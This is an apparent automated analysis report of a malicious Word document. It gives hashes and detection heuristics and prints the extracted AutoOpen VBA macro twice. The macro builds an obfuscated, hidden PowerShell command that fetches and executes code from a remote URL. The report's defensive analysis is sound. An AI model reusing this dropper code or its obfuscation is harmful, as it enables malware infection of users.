Office (OLE) malware analysis — malicious · f423ebaa64cfe955

MALICIOUS

Office (OLE)

283.0 KB Created: 2018-02-12 14:29:00 Authoring application: Microsoft Office Word First seen: 2018-03-04

MD5: 8bc3e9454707aeb24ca447892bfc1beb SHA-1: 2a7c304e07642c4935a6fa88f7d1d0bef3c180e5 SHA-256: f423ebaa64cfe9558cc67e7da6d44a53ba765eb6523be18cbf81932683bc57a0

110 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is designed to execute obfuscated PowerShell commands, likely to download and run a secondary payload. The presence of legacy WordBasic markers and the AutoOpen macro suggest a common macro-based malware delivery technique.

Heuristics 5

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
    FT_PH = FT_PH + JO_QD
    Shell$ FT_PH
End Sub
```

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

Attribute VB_Name = "synergy"
Sub AutoOpen()
    Dim FT_PH As String

Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6210 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6210 bytes
SHA-256: `e0dc7301e0c1234cf444e0f007ffc13c807334ad091b5de2b19cff08f574a565`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "synergy" Sub AutoOpen() Dim FT_PH As String GS_SJ = Array("-", "a", "u", "t", "h", " ", "l", "w", "e", "o", "d", "y", "p", "n", "c", "b", "i", "x", "s", "r") Dim AT_KI As String AT_KI = "ZgB1AG4AYwB0AGk" FT_PH = FT_PH + GS_SJ(12) FT_PH = FT_PH + GS_SJ(9) Dim JM_PC As String JM_PC = "AbwBuACAAYQAoACQAeAA" FT_PH = FT_PH + GS_SJ(7) FT_PH = FT_PH + GS_SJ(8) Dim HK_LG As String HK_LG = "pAHsAcgBlAHQAdQByAG4AI" FT_PH = FT_PH + GS_SJ(19) FT_PH = FT_PH + GS_SJ(18) Dim AL_OA As String AL_OA = "ABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA" FT_PH = FT_PH + GS_SJ(4) FT_PH = FT_PH + GS_SJ(8) Dim FT_MG As String FT_MG = "uAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4AR" JO_QD = JO_QD & AT_KI & JM_PC & HK_LG & AL_OA & FT_MG FT_PH = FT_PH + GS_SJ(6) FT_PH = FT_PH + GS_SJ(6) Dim DP_OG As String DP_OG = "wBlAHQAUwB0AHIAa" FT_PH = FT_PH + GS_SJ(5) FT_PH = FT_PH + GS_SJ(0) Dim ET_PD As String ET_PD = "QBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG" FT_PH = FT_PH + GS_SJ(7) FT_PH = FT_PH + GS_SJ(16) Dim GL_OF As String GL_OF = "4AdgBlAHIAdABdADoAOgBGAHIAbwB" FT_PH = FT_PH + GS_SJ(13) FT_PH = FT_PH + GS_SJ(10) Dim FO_TI As String FO_TI = "tAEIAYQBzAGUANgA0A" FT_PH = FT_PH + GS_SJ(9) FT_PH = FT_PH + GS_SJ(7) Dim FT_QF As String FT_QF = "FMAdAByAGkAbgBnACgAJAB4ACkAKQB9ADsAaQBlAHgAIA" JO_QD = JO_QD & DP_OG & ET_PD & GL_OF & FO_TI & FT_QF FT_PH = FT_PH + GS_SJ(18) FT_PH = FT_PH + GS_SJ(3) Dim DK_TJ As String DK_TJ = "AkACgAYQAgACQAKAAkACgAJAAoAGkAbgB2AG8AawB" FT_PH = FT_PH + GS_SJ(11) FT_PH = FT_PH + GS_SJ(6) Dim ER_SI As String ER_SI = "lAC0AdwBlAGIAcgBlAH" FT_PH = FT_PH + GS_SJ(8) FT_PH = FT_PH + GS_SJ(5) Dim JQ_NE As String JQ_NE = "EAdQBlAHMAdAAgACcAaAB0AHQ" FT_PH = FT_PH + GS_SJ(4) FT_PH = FT_PH + GS_SJ(16) Dim CS_KB As String CS_KB = "AcABzADoALwAvAHUAcwBwAHIAZAA1A" FT_PH = FT_PH + GS_SJ(10) FT_PH = FT_PH + GS_SJ(10) Dim FK_NH As String FK_NH = "DEANQAwAGMAZQBuAHQAcgBhAGw" JO_QD = JO_QD & DK_TJ & ER_SI & JQ_NE & CS_KB & FK_NH FT_PH = FT_PH + GS_SJ(8) FT_PH = FT_PH + GS_SJ(13) Dim GK_KH As String GK_KH = "ALgB0AGEAYgBsAGUAL" FT_PH = FT_PH + GS_SJ(5) FT_PH = FT_PH + GS_SJ(0) Dim AL_PH As String AL_PH = "gBjAG8AcgBlAC" FT_PH = FT_PH + GS_SJ(8) FT_PH = FT_PH + GS_SJ(17) Dim AR_SD As String AR_SD = "4AdwBpAG4AZABvAHcAcwAuAG4AZ" FT_PH = FT_PH + GS_SJ(8) FT_PH = FT_PH + GS_SJ(14) Dim CQ_LI As String CQ_LI = "QB0AC8AdwBhAHIAZ" FT_PH = FT_PH + GS_SJ(2) FT_PH = FT_PH + GS_SJ(3) Dim IS_PA As String IS_PA = "QBoAG8AdQBzAGUAPwAkAGYAaQB" JO_QD = JO_QD & GK_KH & AL_PH & AR_SD & CQ_LI & IS_PA FT_PH = FT_PH + GS_SJ(16) FT_PH = FT_PH + GS_SJ(9) Dim HO_LB As String HO_LB = "sAHQAZQByAD0AUABhAHIAdABpAHQAaQBvAG4ASwBlAHkAJ" FT_PH = FT_PH + GS_SJ(13) FT_PH = FT_PH + GS_SJ(12) Dim AS_LF As String AS_LF = "QAyADAAZQBxACUAMgAwACUAMgA3AHMAdABhAGcAZQAlADIAN" FT_PH = FT_PH + GS_SJ(9) FT_PH = FT_PH + GS_SJ(6) Dim CS_MA As String CS_MA = "wAmACQAUwBlAGwAZQBjAHQAPQBkAGEAdABhACYAcwB" FT_PH = FT_PH + GS_SJ(16) FT_PH = FT_PH + GS_SJ(14) Dim EM_RH As String EM_RH = "2AD0AMgAwADEANwAtADAANAAtAD" FT_PH = FT_PH + GS_SJ(11) FT_PH = FT_PH + GS_SJ(5) Dim GR_TJ As String GR_TJ = "EANwAmAHMAcwA9AGIAZgBxAHQAJgB" JO_QD = JO_QD & HO_LB & AS_LF & CS_MA & EM_RH & GR_TJ FT_PH = FT_PH + GS_SJ(15) FT_PH = FT_PH + GS_SJ(11) Dim JO_OD As String JO_OD = "zAHIAdAA9AHMAYwBvACYAcwBwAD0AcgB3AGQ" FT_PH = FT_PH + GS_SJ(12) FT_PH = FT_PH + GS_SJ(1) Dim JT_PF As String JT_PF = "AbABhAGMAdQBwACYAcwBlAD0" FT_PH = FT_PH + GS_SJ(18) FT_PH = FT_PH + GS_SJ(18) Dim EK_TD As String EK_TD = "AMgAwADEANwAt" FT_PH = FT_PH + GS_SJ(5) FT_PH = FT_PH + GS_SJ(0) Dim IP_RE As String IP_RE = "ADEAMAAtADAANgBUADIA" FT_PH = FT_PH + GS_SJ(8) FT_PH = FT_PH + GS_SJ(5) Dim DL_OA As String DL_OA = "MgA6ADQAMQA6ADEAMgBaAC" JO_QD = JO_QD & JO_OD & JT_PF & EK_TD & IP_RE & DL_OA Dim GO_PJ As String GO_PJ = "YAcwB0AD0AMgAwADEANwAtAD" Dim AS_KA As String AS_KA = "AAOQAtADIAOABUADEANAA6ADQAMQA6ADEAMgBaACYAcwBwA" Dim CN_OI As String CN_OI = "HIAPQBoAHQAdABwAHMAJgBzAGkAZ" Dim IT_OE As String IT_OE = "wA9AHQAegBQADcAYwA4" Dim BO_OD As String BO_OD = "AHgAWgBoAHIAM" JO_QD = JO_QD & GO_PJ & AS_KA & CN_OI & IT_OE & BO_OD Dim JP_LA As String JP_LA = "QBzAGIAd" Dim GQ_PD As String GQ_PD = "gB4ADkAZgBKAFMAdwBKAEkAUwBIAEIANgBlADgAJQAyAEI" Dim CQ_TI As String CQ_TI = "AbgBsAGwAdQB" Dim IN_TB As String IN_TB = "uAEgAaQBmAEwAMwBoAHgAagA0ACUAMwBEAC" Dim IP_PE As String IP_PE = "cAIAAtAEgAZQBhAGQ" JO_QD = JO_QD & JP_LA & GQ_PD & CQ_TI & IN_TB & IP_PE Dim JP_RC As String JP_RC = "AZQByAHMAIABAAHsAJwBBAGMA" Dim JN_LF As String JN_LF = "YwBlAHAAdAAnAD0AJwBBAHAAcABs" Dim IM_RE As String IM_RE = "AGkAYwBhAHQAaQBvAG4" Dim JN_RC As String JN_RC = "ALwBKAFMATwBOACcAfQApAC4" Dim HT_OF As String HT_OF = "AQwBvAG4AdABlAG4AdAAgAHwAIABDAG8AbgB2AGU" JO_QD = JO_QD & JP_RC & JN_LF & IM_RE & JN_RC & HT_OF Dim IT_MA As String IT_MA = "AcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkAL" Dim GQ_RC As String GQ_RC = "gB2AGEAbAB1AGUALgBkAGEAdAB" JO_QD = JO_QD & IT_MA & GQ_RC Dim DM_PJ As String DM_PJ = "hACkAKQ" JO_QD = JO_QD & DM_PJ Dim GS_PH As String GS_PH = "A=" JO_QD = JO_QD & GS_PH FT_PH = FT_PH + JO_QD Shell$ FT_PH End Sub

SHA-256: e0dc7301e0c1234cf444e0f007ffc13c807334ad091b5de2b19cff08f574a565

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "synergy"
Sub AutoOpen()
    Dim FT_PH As String
    GS_SJ = Array("-", "a", "u", "t", "h", " ", "l", "w", "e", "o", "d", "y", "p", "n", "c", "b", "i", "x", "s", "r")
    Dim AT_KI As String
    AT_KI = "ZgB1AG4AYwB0AGk"
    FT_PH = FT_PH + GS_SJ(12)
    FT_PH = FT_PH + GS_SJ(9)
    Dim JM_PC As String
    JM_PC = "AbwBuACAAYQAoACQAeAA"
    FT_PH = FT_PH + GS_SJ(7)
    FT_PH = FT_PH + GS_SJ(8)
    Dim HK_LG As String
    HK_LG = "pAHsAcgBlAHQAdQByAG4AI"
    FT_PH = FT_PH + GS_SJ(19)
    FT_PH = FT_PH + GS_SJ(18)
    Dim AL_OA As String
    AL_OA = "ABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA"
    FT_PH = FT_PH + GS_SJ(4)
    FT_PH = FT_PH + GS_SJ(8)
    Dim FT_MG As String
    FT_MG = "uAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4AR"
    JO_QD = JO_QD & AT_KI & JM_PC & HK_LG & AL_OA & FT_MG
    FT_PH = FT_PH + GS_SJ(6)
    FT_PH = FT_PH + GS_SJ(6)
    Dim DP_OG As String
    DP_OG = "wBlAHQAUwB0AHIAa"
    FT_PH = FT_PH + GS_SJ(5)
    FT_PH = FT_PH + GS_SJ(0)
    Dim ET_PD As String
    ET_PD = "QBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG"
    FT_PH = FT_PH + GS_SJ(7)
    FT_PH = FT_PH + GS_SJ(16)
    Dim GL_OF As String
    GL_OF = "4AdgBlAHIAdABdADoAOgBGAHIAbwB"
    FT_PH = FT_PH + GS_SJ(13)
    FT_PH = FT_PH + GS_SJ(10)
    Dim FO_TI As String
    FO_TI = "tAEIAYQBzAGUANgA0A"
    FT_PH = FT_PH + GS_SJ(9)
    FT_PH = FT_PH + GS_SJ(7)
    Dim FT_QF As String
    FT_QF = "FMAdAByAGkAbgBnACgAJAB4ACkAKQB9ADsAaQBlAHgAIA"
    JO_QD = JO_QD & DP_OG & ET_PD & GL_OF & FO_TI & FT_QF
    FT_PH = FT_PH + GS_SJ(18)
    FT_PH = FT_PH + GS_SJ(3)
    Dim DK_TJ As String
    DK_TJ = "AkACgAYQAgACQAKAAkACgAJAAoAGkAbgB2AG8AawB"
    FT_PH = FT_PH + GS_SJ(11)
    FT_PH = FT_PH + GS_SJ(6)
    Dim ER_SI As String
    ER_SI = "lAC0AdwBlAGIAcgBlAH"
    FT_PH = FT_PH + GS_SJ(8)
    FT_PH = FT_PH + GS_SJ(5)
    Dim JQ_NE As String
    JQ_NE = "EAdQBlAHMAdAAgACcAaAB0AHQ"
    FT_PH = FT_PH + GS_SJ(4)
    FT_PH = FT_PH + GS_SJ(16)
    Dim CS_KB As String
    CS_KB = "AcABzADoALwAvAHUAcwBwAHIAZAA1A"
    FT_PH = FT_PH + GS_SJ(10)
    FT_PH = FT_PH + GS_SJ(10)
    Dim FK_NH As String
    FK_NH = "DEANQAwAGMAZQBuAHQAcgBhAGw"
    JO_QD = JO_QD & DK_TJ & ER_SI & JQ_NE & CS_KB & FK_NH
    FT_PH = FT_PH + GS_SJ(8)
    FT_PH = FT_PH + GS_SJ(13)
    Dim GK_KH As String
    GK_KH = "ALgB0AGEAYgBsAGUAL"
    FT_PH = FT_PH + GS_SJ(5)
    FT_PH = FT_PH + GS_SJ(0)
    Dim AL_PH As String
    AL_PH = "gBjAG8AcgBlAC"
    FT_PH = FT_PH + GS_SJ(8)
    FT_PH = FT_PH + GS_SJ(17)
    Dim AR_SD As String
    AR_SD = "4AdwBpAG4AZABvAHcAcwAuAG4AZ"
    FT_PH = FT_PH + GS_SJ(8)
    FT_PH = FT_PH + GS_SJ(14)
    Dim CQ_LI As String
    CQ_LI = "QB0AC8AdwBhAHIAZ"
    FT_PH = FT_PH + GS_SJ(2)
    FT_PH = FT_PH + GS_SJ(3)
    Dim IS_PA As String
    IS_PA = "QBoAG8AdQBzAGUAPwAkAGYAaQB"
    JO_QD = JO_QD & GK_KH & AL_PH & AR_SD & CQ_LI & IS_PA
    FT_PH = FT_PH + GS_SJ(16)
    FT_PH = FT_PH + GS_SJ(9)
    Dim HO_LB As String
    HO_LB = "sAHQAZQByAD0AUABhAHIAdABpAHQAaQBvAG4ASwBlAHkAJ"
    FT_PH = FT_PH + GS_SJ(13)
    FT_PH = FT_PH + GS_SJ(12)
    Dim AS_LF As String
    AS_LF = "QAyADAAZQBxACUAMgAwACUAMgA3AHMAdABhAGcAZQAlADIAN"
    FT_PH = FT_PH + GS_SJ(9)
    FT_PH = FT_PH + GS_SJ(6)
    Dim CS_MA As String
    CS_MA = "wAmACQAUwBlAGwAZQBjAHQAPQBkAGEAdABhACYAcwB"
    FT_PH = FT_PH + GS_SJ(16)
    FT_PH = FT_PH + GS_SJ(14)
    Dim EM_RH As String
    EM_RH = "2AD0AMgAwADEANwAtADAANAAtAD"
    FT_PH = FT_PH + GS_SJ(11)
    FT_PH = FT_PH + GS_SJ(5)
    Dim GR_TJ As String
    GR_TJ = "EANwAmAHMAcwA9AGIAZgBxAHQAJgB"
    JO_QD = JO_QD & HO_LB & AS_LF & CS_MA & EM_RH & GR_TJ
    FT_PH = FT_PH + GS_SJ(15)
    FT_PH = FT_PH + GS_SJ(11)
    Dim JO_OD As String
    JO_OD = "zAHIAdAA9AHMAYwBvACYAcwBwAD0AcgB3AGQ"
    FT_PH = FT_PH + GS_SJ(12)
    FT_PH = FT_PH + GS_SJ(1)
    Dim JT_PF As String
    JT_PF = "AbABhAGMAdQBwACYAcwBlAD0"
    FT_PH = FT_PH + GS_SJ(18)
    FT_PH = FT_PH + GS_SJ(18)
    Dim EK_TD As String
    EK_TD = "AMgAwADEANwAt"
    FT_PH = FT_PH + GS_SJ(5)
    FT_PH = FT_PH + GS_SJ(0)
    Dim IP_RE As String
    IP_RE = "ADEAMAAtADAANgBUADIA"
    FT_PH = FT_PH + GS_SJ(8)
    FT_PH = FT_PH + GS_SJ(5)
    Dim DL_OA As String
    DL_OA = "MgA6ADQAMQA6ADEAMgBaAC"
    JO_QD = JO_QD & JO_OD & JT_PF & EK_TD & IP_RE & DL_OA
    Dim GO_PJ As String
    GO_PJ = "YAcwB0AD0AMgAwADEANwAtAD"
    Dim AS_KA As String
    AS_KA = "AAOQAtADIAOABUADEANAA6ADQAMQA6ADEAMgBaACYAcwBwA"
    Dim CN_OI As String
    CN_OI = "HIAPQBoAHQAdABwAHMAJgBzAGkAZ"
    Dim IT_OE As String
    IT_OE = "wA9AHQAegBQADcAYwA4"
    Dim BO_OD As String
    BO_OD = "AHgAWgBoAHIAM"
    JO_QD = JO_QD & GO_PJ & AS_KA & CN_OI & IT_OE & BO_OD
    Dim JP_LA As String
    JP_LA = "QBzAGIAd"
    Dim GQ_PD As String
    GQ_PD = "gB4ADkAZgBKAFMAdwBKAEkAUwBIAEIANgBlADgAJQAyAEI"
    Dim CQ_TI As String
    CQ_TI = "AbgBsAGwAdQB"
    Dim IN_TB As String
    IN_TB = "uAEgAaQBmAEwAMwBoAHgAagA0ACUAMwBEAC"
    Dim IP_PE As String
    IP_PE = "cAIAAtAEgAZQBhAGQ"
    JO_QD = JO_QD & JP_LA & GQ_PD & CQ_TI & IN_TB & IP_PE
    Dim JP_RC As String
    JP_RC = "AZQByAHMAIABAAHsAJwBBAGMA"
    Dim JN_LF As String
    JN_LF = "YwBlAHAAdAAnAD0AJwBBAHAAcABs"
    Dim IM_RE As String
    IM_RE = "AGkAYwBhAHQAaQBvAG4"
    Dim JN_RC As String
    JN_RC = "ALwBKAFMATwBOACcAfQApAC4"
    Dim HT_OF As String
    HT_OF = "AQwBvAG4AdABlAG4AdAAgAHwAIABDAG8AbgB2AGU"
    JO_QD = JO_QD & JP_RC & JN_LF & IM_RE & JN_RC & HT_OF
    Dim IT_MA As String
    IT_MA = "AcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkAL"
    Dim GQ_RC As String
    GQ_RC = "gB2AGEAbAB1AGUALgBkAGEAdAB"
    JO_QD = JO_QD & IT_MA & GQ_RC
    Dim DM_PJ As String
    DM_PJ = "hACkAKQ"
    JO_QD = JO_QD & DM_PJ
    Dim GS_PH As String
    GS_PH = "A="
    JO_QD = JO_QD & GS_PH
    FT_PH = FT_PH + JO_QD
    Shell$ FT_PH
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.